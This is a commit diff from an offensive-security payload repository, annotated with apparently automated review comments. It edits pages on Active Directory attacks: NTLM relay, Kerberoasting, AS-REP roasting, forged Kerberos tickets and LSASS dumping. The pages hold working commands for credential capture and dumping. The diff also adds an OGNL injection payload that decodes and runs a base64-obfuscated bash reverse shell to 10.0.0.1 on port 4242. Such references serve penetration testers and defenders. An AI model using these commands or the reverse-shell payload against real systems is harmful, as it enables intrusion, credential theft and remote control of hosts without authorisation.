Merge branch 'swisskyrepo:main' into main

pull/3/head
CravateRouge 2024-01-15 17:58:20 +01:00 committed by GitHub
commit 20661f1e96
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
13 changed files with 72 additions and 23 deletions

View File

@ -112,6 +112,7 @@ Automated exploitation:
```
**Mitigations**:
* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)

View File

@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
The exploit will execute the DLL either from the local filesystem or a remote share.
Requirements:
* **Spooler Service** enabled (Mandatory)
* Server with patches < June 2021
* DC with `Pre Windows 2000 Compatibility` group
@ -14,6 +15,7 @@ Requirements:
**Detect the vulnerability**:
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
```ps1
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
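Review bot: the rpcdump detection block opens with a `ps1` fence but its only line, `python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'`, is a Linux shell pipeline; tag it `bash` like the other Impacket examples, and prefer `grep -E` over the deprecated `egrep`.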
@ -28,20 +30,23 @@ Requirements:
```
**Payload Hosting**:
* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109):
```ps1
python3 ./smbserver.py share /tmp/smb/
```
```ps1
python3 ./smbserver.py share /tmp/smb/
```
* Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host):
```ps1
Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
```
```ps1
Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
```
* Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights):
```ps1
SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
```
```ps1
SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
```
When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll`
WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
```ps1
cme smb -u user -p password -d domain.local -M webdav [TARGET]
```
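Review bot: fence tags in this hunk do not match their contents: `python3 ./smbserver.py share /tmp/smb/` and `cme smb -u user -p password -d domain.local -M webdav [TARGET]` are Linux commands inside `ps1` fences, while only the Invoke-BuildAnonymousSMBServer and SharpWebServer blocks are actually PowerShell/Windows. Suggest `bash` for the two Linux blocks. Also the protocol is spelled `WebDav`, `webdav` and `WebDav client` across the paragraph; settle on WebDAV.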

View File

@ -2,11 +2,14 @@
## Using BloodHound
Use the correct collector
Use the correct collector:
* AzureHound for Azure Active Directory
* SharpHound for local Active Directory
* RustHound for local Active Directory
**Examples**:
* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
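Review bot: the SharpHound and RustHound bullets carry the identical text "for local Active Directory", so the list does not help the reader "Use the correct collector" as the line above asks; state how the two differ (e.g. the platform each runs from) and add a RustHound link in the Examples list, which currently links only AzureHound and BloodHound.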
@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up
```
You can add some custom queries like :
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
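Review bot: "You can add some custom queries like :" has a space before the colon (French typography) and reads better as "You can add custom queries such as:"; style only.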

View File

@ -5,6 +5,7 @@ You will need the following files to extract the ntds :
- SYSTEM hive (`C:\Windows\System32\SYSTEM`)
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashmob.net](https://hashmob.net)
- [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash)
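Review bot: ":warning: If the password is not a confidential data (challenges/ctf)" is ungrammatical; suggest "If the hash is not confidential (challenges/CTF), you can use online crackers such as:". Worth keeping the warning explicit that submitting a hash to one of these sites discloses it to a third party.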

View File

@ -3,6 +3,7 @@
> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
**Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux:
```ps1
@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
```
**Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
## Kerberoasting w/o domain account
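Review bot: the only mitigation listed, `* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).`, covers the setting itself; for accounts that legitimately need DONT_REQ_PREAUTH, suggest a second bullet on long random passwords and on monitoring TGT requests with Pre-Authentication Type 0 (event 4768), since those are exactly the accounts the technique above targets.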
@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w
Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
**Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux:
```ps1
@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
```
* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
* Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
```bash
user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
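Review bot: the `CVE-2022-33679.py` block prefixes each command with `user@hostname:~$`, unlike the other bash blocks in this file, which breaks copy-paste; drop the prompts. `export KRB5CCNAME=/home/project/User.ccache` also hardcodes a path; say where the script writes the ccache instead of assuming `/home/project`.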
@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
```
**Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* Disable RC4 cipher if possible.
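Review bot: "Disable RC4 cipher if possible." should say where: the "Network security: Configure encryption types allowed for Kerberos" policy and the account's `msDS-SupportedEncryptionTypes` attribute. "RC4 cipher" is better as "RC4 encryption type" to match Kerberos terminology.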

View File

@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
**Mitigations**:
* Have a very long password for your accounts with SPNs (> 32 characters)
* Make sure no users have SPNs
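Review bot: "Make sure no users have SPNs" is not achievable for real service accounts; suggest "Run services under gMSA accounts rather than user accounts with SPNs", and add an AES-only bullet (`msDS-SupportedEncryptionTypes`) so tickets are not issued with the `etype 23` the context line refers to.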

View File

@ -67,7 +67,8 @@
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
On the machine.
On the machine
* Find SCCM blob
```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
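Review bot: "On the machine" is a sentence fragment; suggest "On the SCCM client machine:" so the following "Find SCCM blob" bullet reads as a step. Also `Get-Wmiobject` should be `Get-WmiObject` for consistent cmdlet casing.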

View File

@ -2,14 +2,16 @@
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
**Requirements**:
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
**Exploitation**:
* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
```ps1
HTTPS = On
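Review bot: the rewritten line `> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from ...` still carries the typo "symetric" (should be "symmetric"), and "as symetric keys" should be singular "as the symmetric key". Since the line is being touched anyway, fix both here.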
@ -68,6 +70,7 @@
* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
## Capturing and cracking Net-NTLMv2/NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
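Review bot: "mistype" should be "mistypes" to agree with "tries", and `MDNS` should be `mDNS` to match the protocol name used elsewhere.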

View File

@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets
## LDAP signing not required and LDAP channel binding disabled
During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
* LDAP signing not required (by default set to `Not required`)
* LDAP channel binding is disabled. (by default disabled)
* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
```bash
# On first terminal
sudo ./Responder.py -I eth0 -wfrd -P -v
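Review bot: "LDAP channel binding is disabled. (by default disabled)" has a stray period before the parenthetical, and "needs to be at least at 1" should be "needs to be at least 1". Consider also "During a security assessment" and "NTLM relaying attack" → "an NTLM relay attack".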
@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
```
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
```powershell
# create a new machine account
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
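Review bot: the block starting `# create a new machine account` / `TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support` is fenced as `powershell` although it is a Linux command with a `TERM1>` prompt; tag it `bash` like the Responder/ntlmrelayx block earlier in the file.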
@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
## Ghost Potato - CVE-2019-1384
Requirements:
* User must be a member of the local Administrators group
* User must be a member of the Backup Operators group
* Token must be elevated
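Review bot: the Ghost Potato requirements read as three conjunctive bullets (local Administrators and Backup Operators and an elevated token); if Administrators and Backup Operators are alternatives, say "one of" so the reader knows which combination applies.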
@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
Requirements:
- a shell in session 0 (e.g. WinRm shell or SSH shell)
- a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
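Review bot: "a privileged user is logged on in the session 1" should be "is logged on in session 1"; likewise "WinRm shell" → "WinRM shell" in the bullet above.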
@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
## DNS Poisonning - Relay delegation with mitm6
Requirements:
- IPv6 enabled (Windows prefers IPV6 over IPv4)
- LDAP over TLS (LDAPS)
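Review bot: the heading "DNS Poisonning" should be "DNS Poisoning", and the first requirement mixes "IPv6" and "IPV6"; use "IPv6" in both places.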
@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local
> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
**Requirement**:
* WebClient service
**Exploitation**:
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
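Review bot: "**Requirement**:" should be "**Requirements**:" to match the other sections (this same commit renames "Require:" to "Requirements:" elsewhere). "Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`" would also be clearer if it named the setting to change, in the same `HTTP = Off` form the NTLMv1 section uses for `HTTPS = On`.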
@ -267,12 +274,16 @@ pyrdp-mitm.py <IP>
pyrdp-mitp.py <IP>:<PORT> # with custom port
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
```
* Exploitation
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
* If NLA is disabled, you will obtain the password in plaintext
* Other features are available such as keystroke recording
* Alternatives
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
**Exploitation**
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
* If NLA is disabled, you will obtain the password in plaintext
* Other features are available such as keystroke recording
**Alternatives**
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
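Review bot: the context line `pyrdp-mitp.py <IP>:<PORT> # with custom port` misspells the tool name (`pyrdp-mitp` vs `pyrdp-mitm` on the neighbouring lines); fix in a follow-up. Replacing the nested "* Exploitation" / "* Alternatives" bullets with bold "**Exploitation**" / "**Alternatives**" headings is fine, but the bullet should spell the tool "Seth" as its URL does, not "S3th".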
## References

View File

@ -9,6 +9,7 @@ CVE-2020-17049
:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
Requirements:
* Service account's password hash
* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013)
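Review bot: "Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`" has a stray possessive; suggest "Service account with ...", and "Service account's password hash" → "Service account password hash".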

View File

@ -111,6 +111,7 @@ Converting kirbi => ccache
Mitigations:
* Hard to detect because they are legit TGT tickets
* Mimikatz generate a golden ticket with a life-span of 10 years
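Review bot: the two bullets under "Mitigations:" ("Hard to detect because they are legit TGT tickets", "Mimikatz generate a golden ticket with a life-span of 10 years") describe detection difficulty, not mitigations; suggest moving them under a "Detection" heading and adding a real mitigation such as resetting the krbtgt password twice after a compromise. Also "generate" → "generates".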
@ -148,6 +149,7 @@ Interesting services to target with a silver ticket :
Mitigations:
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
@ -155,7 +157,8 @@ Mitigations:
> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
Require:
Requirements:
* krbtgt NT Hash
* krbtgt AES key
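Review bot: the requirements list both "krbtgt NT Hash" and "krbtgt AES key" while the blockquote says "providing the krbtgt encryption key" (singular); state whether both are needed or either one suffices.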
@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR
The goal is to mimic the PAC field as close as possible to a legitimate one.
Require:
Requirements:
* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
* krbtgt AES key

View File

@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
* Adding requires lock
* Removing requires reboot
## LSA Protection Workaround
- LSA as a Protected Process (RunAsPPL)
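Review bot: "Adding requires lock" / "Removing requires reboot" do not say what is being added or removed; given the context line `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo...`, name the `UseLogonCredential` value explicitly so the two bullets are self-contained.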
@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
Use the minidump:
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
```powershell
mimikatz # sekurlsa::minidump lsass.dmp
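Review bot: the bullet `Mimikatz: .\mimikatz.exe "sekurlsa::minidump lsass.dmp"` and the fenced block `mimikatz # sekurlsa::minidump lsass.dmp` duplicate each other; keep one, and the fence should not be tagged `powershell` since its content is the mimikatz console prompt.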

View File

@ -22,6 +22,7 @@
* [Netcat BusyBox](#netcat-busybox)
* [Netcat Traditional](#netcat-traditional)
* [NodeJS](#nodejs)
* [OGNL](#ognl)
* [OpenSSL](#openssl)
* [Perl](#perl)
* [PHP](#php)
@ -389,6 +390,16 @@ or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
### OGNL
```java
(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
```
With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell.
### Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
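Review bot: "the payload within the single quotes might be changed by any Linux-compatible reverse shell" should read "can be replaced with", and the sentence should say that the base64 string has to be re-encoded after editing, since the expression only carries the encoded form. The `java` fence tag is an acceptable approximation for an OGNL expression as no `ognl` highlighter exists.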